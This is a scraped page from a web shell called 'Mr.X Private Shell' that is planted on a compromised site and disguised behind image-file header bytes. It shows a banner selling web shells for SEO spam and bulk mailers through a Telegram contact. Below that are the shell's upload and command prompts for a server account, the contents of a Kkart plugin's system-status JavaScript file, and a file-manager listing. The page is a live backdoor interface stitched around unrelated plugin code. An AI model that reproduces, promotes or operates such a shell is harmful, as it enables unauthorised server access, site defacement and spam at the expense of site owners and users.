����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
/* global jQuery, kkart_admin_system_status, wcSetClipboard, wcClearClipboard */
jQuery( function ( $ ) {

	/**
	 * Users country and state fields
	 */
	var wcSystemStatus = {
		init: function() {
			$( document.body )
				.on( 'click', 'a.help_tip, a.kkart-help-tip', this.preventTipTipClick )
				.on( 'click', 'a.debug-report', this.generateReport )
				.on( 'click', '#copy-for-support', this.copyReport )
				.on( 'aftercopy', '#copy-for-support', this.copySuccess )
				.on( 'aftercopyfailure', '#copy-for-support', this.copyFail );
		},

		/**
		 * Prevent anchor behavior when click on TipTip.
		 *
		 * @return {Bool}
		 */
		preventTipTipClick: function() {
			return false;
		},

		/**
		 * Generate system status report.
		 *
		 * @return {Bool}
		 */
		generateReport: function() {
			var report = '';

			$( '.kkart_status_table thead, .kkart_status_table tbody' ).each( function() {
				if ( $( this ).is( 'thead' ) ) {
					var label = $( this ).find( 'th:eq(0)' ).data( 'export-label' ) || $( this ).text();
					report = report + '\n### ' + $.trim( label ) + ' ###\n\n';
				} else {
					$( 'tr', $( this ) ).each( function() {
						var label       = $( this ).find( 'td:eq(0)' ).data( 'export-label' ) || $( this ).find( 'td:eq(0)' ).text();
						var the_name    = $.trim( label ).replace( /(<([^>]+)>)/ig, '' ); // Remove HTML.

						// Find value
						var $value_html = $( this ).find( 'td:eq(2)' ).clone();
						$value_html.find( '.private' ).remove();
						$value_html.find( '.dashicons-yes' ).replaceWith( '&#10004;' );
						$value_html.find( '.dashicons-no-alt, .dashicons-warning' ).replaceWith( '&#10060;' );

						// Format value
						var the_value   = $.trim( $value_html.text() );
						var value_array = the_value.split( ', ' );

						if ( value_array.length > 1 ) {
							// If value have a list of plugins ','.
							// Split to add new line.
							var temp_line ='';
							$.each( value_array, function( key, line ) {
								temp_line = temp_line + line + '\n';
							});

							the_value = temp_line;
						}

						report = report + '' + the_name + ': ' + the_value + '\n';
					});
				}
			});

			try {
				$( '#debug-report' ).slideDown();
				$( '#debug-report' ).find( 'textarea' ).val( '`' + report + '`' ).focus().select();
				$( this ).fadeOut();
				return false;
			} catch ( e ) {
				/* jshint devel: true */
				console.log( e );
			}

			return false;
		},

		/**
		 * Copy for report.
		 *
		 * @param {Object} evt Copy event.
		 */
		copyReport: function( evt ) {
			wcClearClipboard();
			wcSetClipboard( $( '#debug-report' ).find( 'textarea' ).val(), $( this ) );
			evt.preventDefault();
		},

		/**
		 * Display a "Copied!" tip when success copying
		 */
		copySuccess: function() {
			$( '#copy-for-support' ).tipTip({
				'attribute':  'data-tip',
				'activation': 'focus',
				'fadeIn':     50,
				'fadeOut':    50,
				'delay':      0
			}).focus();
		},

		/**
		 * Displays the copy error message when failure copying.
		 */
		copyFail: function() {
			$( '.copy-error' ).removeClass( 'hidden' );
			$( '#debug-report' ).find( 'textarea' ).focus().select();
		}
	};

	wcSystemStatus.init();

	$( '.kkart_status_table' ).on( 'click', '.run-tool .button', function( evt ) {
		evt.stopImmediatePropagation();
		return window.confirm( kkart_admin_system_status.run_tool_confirmation );
	});

	$( '#log-viewer-select' ).on( 'click', 'h2 a.page-title-action', function( evt ) {
		evt.stopImmediatePropagation();
		return window.confirm( kkart_admin_system_status.delete_log_confirmation );
	});
});

Filemanager

Name Type Size Permission Actions
api-keys.js File 3.82 KB 0644
api-keys.min.js File 2.15 KB 0644
backbone-modal.js File 3.48 KB 0644
backbone-modal.min.js File 2.19 KB 0644
kkart-clipboard.js File 858 B 0644
kkart-clipboard.min.js File 327 B 0644
kkart-enhanced-select.js File 9.05 KB 0644
kkart-enhanced-select.min.js File 5.24 KB 0644
kkart-orders.js File 1.94 KB 0644
kkart-orders.min.js File 1.13 KB 0644
kkart-product-export.js File 3.54 KB 0644
kkart-product-export.min.js File 1.93 KB 0644
kkart-product-import.js File 2.58 KB 0644
kkart-product-import.min.js File 1.45 KB 0644
kkart-setup.js File 10 KB 0644
kkart-setup.min.js File 6.37 KB 0644
kkart-shipping-classes.js File 7.96 KB 0644
kkart-shipping-classes.min.js File 4.46 KB 0644
kkart-shipping-zone-methods.js File 15.1 KB 0644
kkart-shipping-zone-methods.min.js File 8.52 KB 0644
kkart-shipping-zones.js File 8.92 KB 0644
kkart-shipping-zones.min.js File 4.74 KB 0644
kkart_admin.js File 13.45 KB 0644
kkart_admin.min.js File 8.07 KB 0644
marketplace-suggestions.js File 15.54 KB 0644
marketplace-suggestions.min.js File 6.11 KB 0644
meta-boxes-coupon.js File 1.98 KB 0644
meta-boxes-coupon.min.js File 1.15 KB 0644
meta-boxes-order.js File 45.57 KB 0644
meta-boxes-order.min.js File 27.96 KB 0644
meta-boxes-product-variation.js File 32.37 KB 0644
meta-boxes-product-variation.min.js File 17.56 KB 0644
meta-boxes-product.js File 21.64 KB 0644
meta-boxes-product.min.js File 13.13 KB 0644
meta-boxes.js File 2.47 KB 0644
meta-boxes.min.js File 1.71 KB 0644
network-orders.js File 2.29 KB 0644
network-orders.min.js File 1.19 KB 0644
product-ordering.js File 2.25 KB 0644
product-ordering.min.js File 1.47 KB 0644
quick-edit.js File 6.73 KB 0644
quick-edit.min.js File 4.33 KB 0644
reports.js File 6.31 KB 0644
reports.min.js File 3.17 KB 0644
settings-views-html-settings-tax.js File 11.98 KB 0644
settings-views-html-settings-tax.min.js File 6 KB 0644
settings.js File 5.36 KB 0644
settings.min.js File 3.55 KB 0644
system-status.js File 3.49 KB 0644
system-status.min.js File 1.92 KB 0644
term-ordering.js File 4.17 KB 0644
term-ordering.min.js File 2.19 KB 0644
users.js File 3.76 KB 0644
users.min.js File 1.84 KB 0644